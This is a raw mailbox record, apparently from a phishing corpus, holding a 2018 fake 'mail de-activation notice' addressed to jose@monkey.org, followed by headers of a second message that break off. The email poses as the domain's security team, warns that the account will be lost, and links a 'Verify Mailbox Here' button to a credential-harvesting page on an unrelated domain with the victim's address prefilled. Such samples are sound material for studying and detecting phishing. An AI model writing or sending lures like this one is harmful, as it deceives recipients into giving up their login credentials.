From: monkey.org  <postmaster@one-email.com>
To: jose@monkey.org
Subject: Your Mail jose@monkey.org De-activation Notice
Date: 27 May 2018 22:26:45 -0700
Message-ID: <20180527222644.18D80DF7F255F87D@one-email.com>
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - uk02.solidhosting.pro
X-AntiAbuse: Original Domain - monkey.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - one-email.com
X-Get-Message-Sender-Via: uk02.solidhosting.pro: authenticated_id: info@maheshprajapati.com
X-Authenticated-Sender: uk02.solidhosting.pro: info@maheshprajapati.com
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Status: O
X-Status: 
X-Keywords:                  
X-UID: 507

<HTML><BODY><P style=3D"FONT-SIZE: 12px; FONT-FAMILY: arial, sans-serif; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(34,34,34); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-=
SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font=
-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-stroke-=
width: 0px; text-decoration-style: initial; text-decoration-color: initial"=
>Dear<SPAN>&nbsp;jose</SPAN><SPAN>&nbsp;</SPAN>,<BR></P>
<P style=3D"FONT-SIZE: 12px; FONT-FAMILY: arial, sans-serif; WHITE-SPACE: n=
ormal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rg=
b(34,34,34); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: nor=
mal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-lig=
atures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; =
text-decoration-style: initial; text-decoration-color: initial"><FONT size=
=3D2 face=3DVerdana>We're no longer able to verify your identity, and we st=
rongly encourage you to verify it.</FONT></P>
<P>
<TABLE style=3D"FONT-SIZE: 12px; FONT-FAMILY: arial, sans-serif; WHITE-SPAC=
E: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR=
: rgb(34,34,34); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING:=
 normal; TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-cap=
s: normal; -webkit-text-stroke-width: 0px; text-decoration-style: initial; =
text-decoration-color: initial" height=3D40 width=3D400 bgColor=3D#fcb16f>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px">
<DIV align=3Dcenter><FONT color=3D#ffffff>
<DIV align=3Dcenter><A style=3D"TEXT-DECORATION: none; COLOR: rgb(17,85,204=
)" href=3D"https://dodiekwanda.com/user/late-code/index.php?email=3Djose@mo=
nkey.org" rel=3D"noopener noreferrer" target=3D_blank><FONT color=3D#ffffff=
 size=3D2 face=3DVerdana>Verify Mailbox Here</FONT></A></DIV></FONT></DIV><=
/TD></TR></TBODY></TABLE></P>
<P style=3D"FONT-SIZE: 12px; FONT-FAMILY: arial, sans-serif; WHITE-SPACE: n=
ormal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rg=
b(34,34,34); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: nor=
mal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-lig=
atures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; =
text-decoration-style: initial; text-decoration-color: initial"><BR>You sta=
nd the chance of losing your account if you are not below validation.</P>
<P style=3D"FONT-SIZE: 12px; FONT-FAMILY: arial, sans-serif; WHITE-SPACE: n=
ormal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rg=
b(34,34,34); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: nor=
mal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-lig=
atures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; =
text-decoration-style: initial; text-decoration-color: initial">Thank you</=
P>
<P style=3D"FONT-SIZE: 12px; FONT-FAMILY: arial, sans-serif; WHITE-SPACE: n=
ormal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rg=
b(34,34,34); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: nor=
mal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-lig=
atures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; =
text-decoration-style: initial; text-decoration-color: initial">Source: mon=
key.org Security Team 2018</P>
<P><BR class=3DApple-interchange-newline>&nbsp;</P></BODY></HTML>

From jose@monkey.org Mon May 28 11:05:40 2018 +0000
Return-Path: swilson@hcnj.us
Delivered-To: jose@monkey.org
X-FDA: 74213194440.07.watch84_4e9e6f04c1c31
X-Spam-Summary: 77,5.5,0,3b6954aabe954a9b,d41d8cd98f00b204,swilson@hcnj.us,,RULES_HIT:10:41:72:355:379:582:960:962:967:973:978:983:988:989:1021:1029:1152:1189:1208:1221:1260:1263:1313:1314:1345:1381:1431:1436:1437:1516:1517:1518:1535:1544:1566:1575:1588:1589:1592:1594:1691:1711:1714:1730:1777:1792:1803:2525:2526:2527:2528:2551:2553:2561:2564:2610:2682:2685:2693:2859:2890:2892:2895:2900:2901:2902:2917:2923:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3865:3867:3868:3870:3872:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4048:4120:4321:4362:4379:5007:6117:6261:6658:6675:6678:7688:7903:8603:8957:9025:9388:9868:9908:10004:10026:10049:10197:10214:10346:10919:11245:11527:11656:11658:11914:12037:12043:12050:12295:12331:12438:12517:12519:12551:12555:12660:12895:13139:13237:13439:14096:14181:14721:14828:14885:21326:21433:21450:21451:21499:21627:30001:30022:30054:30070:30075:30090:30091,0,RBL:63.96.244.36:@hcnj.us:.lbl8.mailshell.net-62.2.0
X-HE-Tag: watch84_4e9e6f04c1c31
X-Filterd-Recvd-Size: 9019
Received: from mx2.hcnj.us (mail.hcnj.us [63.96.244.36])
	by imf14.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon, 28 May 2018 11:05:40 +0000 (UTC)
Received: from mail.hcnj.us (hcp-mb-01.hcnj.loc [172.16.159.35])
	(using TLSv1.2 with cipher ECDHE-RSA-AES256-SHA384 (256/256 bits))
	(No client certificate requested)
	by mx2.hcnj.us (MTA) with ESMTPS id 40vYY26g3SzvQKf;
	Mon, 28 May 2018 06:50:30 -0400 (EDT)
Received: from hcp-mb-02.hcnj.loc (172.16.159.36) by hcp-mb-01.hcnj.loc
 (172.16.159.35) with Microsoft SMTP Server (version=TLS1_2,
 cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P384) id 15.1.544.27; Mon, 28
 May 2018 06:50:30 -0400
Received: from hcp-mb-02.hcnj.loc ([fe80::d90b:225c:9a67:8b3]) by
 hcp-mb-02.hcnj.loc ([fe80::d90b:225c:9a67:8b3%14]) with mapi id
 15.01.0544.027; Mon, 28 May 2018 06:50:30 -0400
